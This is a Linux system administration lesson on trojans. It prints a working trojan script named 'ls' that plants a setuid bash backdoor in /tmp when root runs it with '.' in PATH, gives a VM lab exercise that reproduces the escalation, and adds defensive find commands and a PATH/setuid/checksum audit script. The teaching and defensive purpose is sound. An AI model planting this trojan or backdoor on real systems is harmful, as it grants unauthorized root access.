Lesson 13

Date: 7/3/2017
Application security and Intrusion detection
Linux System Administration

Example of a Trojan

  • Assume root's PATH has the current directory first: PATH=.:$PATH

  • The hacker puts the script below in /tmp and names it ls.

  • When root changes into /tmp and runs ls, the trojan runs instead of /bin/ls and creates a back door for the hacker.

  • When a user executes /tmp/.sh -p he becomes root (bash -p keeps the effective UID granted by the setuid bit instead of dropping it).
  • The trojan script, ls:
    #!/bin/sh
    # check if I am the root:
    who=$(whoami)
    if [ "$who" = "root" ]
    then
        # plant a setuid copy of bash and remove the trojan itself
        cp /bin/bash .sh
        chmod 4755 .sh
        /bin/rm ls
    fi
    # behave like the real ls so nothing looks wrong
    /bin/ls "$@"

  • The back door this trojan leaves behind can be found with the find command (both forms match files with the setuid or setgid bit set):
    find /tmp -type f -perm /u=s,g=s -ls
    find /tmp -type f -perm /6000 -ls
  • Very often, Trojans arrive bundled with new software. Verify the developers' signatures using checksums or GPG/PGP tools.

    Perform the exercise below on the smbhost VM that you deployed in the previous lesson.
    virsh start smbhost
    Figure out the IP address of smbhost:
    grep smbhost /var/lib/libvirt/dnsmasq/default.leases
    Initiate two SSH connections to smbhost from different terminal windows. For example, the IP address of smbhost is
    Do the same SSH command in the other terminal window.
    While logged in as user hostadm, create the script ls in /tmp, then make it executable:
    chmod 755 ls
    In the other terminal, become root:
    sudo -s
    Modify your PATH variable by including ".", step into /tmp, and execute the command ls:
    export PATH=.:$PATH
    cd /tmp
    ls
    In the other terminal window, where you are still the unprivileged user hostadm, run
    cd /tmp
    /tmp/.sh -p
    then see what happens.
    When you finish the exercise, DON'T FORGET to remove /tmp/.sh !!!
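The three defensive checks the lesson recommends (keep "." and world-writable directories out of PATH, scan for setuid/setgid files with find, and verify downloads against a published checksum) collected into one POSIX shell script. This is an example added here, not part of the lesson or the course material; the function names and the scratch fixture directory it builds are assumptions, and it never touches the real /tmp.

```shell
#!/bin/sh
# Added example: defensive checks against the PATH trojan from the lesson.
# Function names and the constructed fixture below are assumptions, not
# part of the lesson material.

# audit_path PATHSTRING
# Prints every unsafe entry (empty, ".", "..", any other relative entry, or a
# world-writable directory) and returns 1 if any was found, 0 otherwise.
audit_path() {
    rest="$1:"          # trailing ':' makes the last entry parse like the rest
    bad=0
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"
        rest="${rest#*:}"
        case "$entry" in
            "")
                echo "UNSAFE: empty entry (means the current directory)"
                bad=1 ;;
            /*)
                # -prune keeps find from descending; -perm -0002 = writable by others
                if [ -d "$entry" ] && [ -n "$(find "$entry" -prune -perm -0002 -print 2>/dev/null)" ]; then
                    echo "UNSAFE: world-writable directory $entry"
                    bad=1
                fi ;;
            *)
                echo "UNSAFE: relative entry '$entry'"
                bad=1 ;;
        esac
    done
    return $bad
}

# find_setuid DIR
# Lists regular files under DIR with the setuid or setgid bit set; this is
# the POSIX spelling of the lesson's "find /tmp -type f -perm /6000".
find_setuid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# sha256_of FILE -> hex digest (sha256sum on Linux, shasum where it is absent)
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_checksum FILE EXPECTED_SHA256 -> 0 on match, 1 on mismatch
verify_checksum() {
    actual=$(sha256_of "$1")
    if [ "$actual" = "$2" ]; then
        echo "OK: $1"
        return 0
    fi
    echo "MISMATCH: $1 expected $2 got $actual"
    return 1
}

# make_fixture
# Builds a constructed scratch directory (not the real /tmp) holding a
# harmless setuid file, a plain file and a world-writable subdirectory,
# and prints its path.
make_fixture() {
    d=$(mktemp -d)
    printf 'hello\n' > "$d/plain"
    chmod 644 "$d/plain"
    cp "$d/plain" "$d/marker"
    chmod 4755 "$d/marker"      # setuid bit, the mode the trojan's chmod 4755 leaves
    mkdir "$d/wwbin"
    chmod 1777 "$d/wwbin"
    echo "$d"
}

# Demonstration run against the fixture only.
demo() {
    d=$(make_fixture)
    echo "== PATH audit =="
    audit_path ".:/usr/bin:$d/wwbin" || echo "(PATH is unsafe)"
    echo "== setuid/setgid scan =="
    find_setuid "$d"
    echo "== checksum check (sha256 of the constructed file 'hello\n') =="
    verify_checksum "$d/plain" 5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03
    rm -rf "$d"
}

demo
```

In the audit, a PATH entry like /tmp is flagged as world-writable even though the sticky bit is set, which is the point: any directory that other users can write into must not come before /bin and /usr/bin in root's PATH. The setuid scan is the one to run over /tmp, /var/tmp and home directories after the exercise, and the checksum function stands in for the "verify with checksums" step whenever a vendor publishes a SHA-256 alongside a download.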
